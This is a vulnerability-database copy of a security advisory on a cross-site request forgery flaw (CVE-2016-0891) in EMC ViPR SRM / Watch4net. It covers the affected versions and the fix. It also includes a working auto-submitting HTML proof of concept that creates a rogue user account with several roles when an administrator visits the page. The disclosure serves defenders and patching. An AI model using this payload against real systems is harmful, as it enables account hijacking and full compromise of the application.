Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

EMC ViPR SRM Cross Site Request Forgery

Related Vulnerabilities: CVE-2016-0891  
Publish Date: 27 Apr 2016
Author: Securify B.V.
Source 
                							

                ------------------------------------------------------------------------
EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection
------------------------------------------------------------------------
Han Sahin, November 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that EMC M&R (Watch4net) does not protect against
Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can
compromise end user data and may allow an attacker to perform an account
hijack. If the targeted end user is the administrator account, this
results in a full compromise of Watch4net.

------------------------------------------------------------------------
Affected versions
------------------------------------------------------------------------
Versions of EMC ViPR SRM prior to version 3.7 are affected by these
vulnerabilities.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- http://seclists.org/bugtraq/2016/Apr/att-106/ESA-2016-039.txt
- CVE-2016-0891

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please
note that this fix is only available for registered EMC Online Support
customers.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20141109/emc_m_r__watch4net__lacks_cross_site_request_forgery_protection.html

The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.

<html>
   <body>
      <form action="http://<target>:58080/APG/admin/form" method="POST">
         <input type="hidden" name="form-id" value="UserForm" />
         <input type="hidden" name="ident" value="" />
         <input type="hidden" name="old" value="" />
         <input type="hidden" name="name" value="CSRF" />
         <input type="hidden" name="password" value="1" />
         <input type="hidden" name="confirm" value="1" />
         <input type="hidden" name="title" value="" />
         <input type="hidden" name="first-name" value="Han" />
         <input type="hidden" name="last-name" value="Sahin" />
         <input type="hidden" name="email" value="attacker@example.com" />
         <input type="hidden" name="role" value="user" />
         <input type="hidden" name="profile" value="0" />
         <input type="hidden" name="user-roles" value="5" />
         <input type="hidden" name="user-roles" value="1" />
         <input type="hidden" name="user-roles" value="3" />
         <input type="hidden" name="user-roles" value="4" />
         <input type="hidden" name="user-roles" value="2" />
         <input type="hidden" name="user-roles" value="6" />
         <input type="hidden" name="filter" value="" />
         <input type="hidden" name="custom" value="true" />
         <input type="submit" value="Submit request" />
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started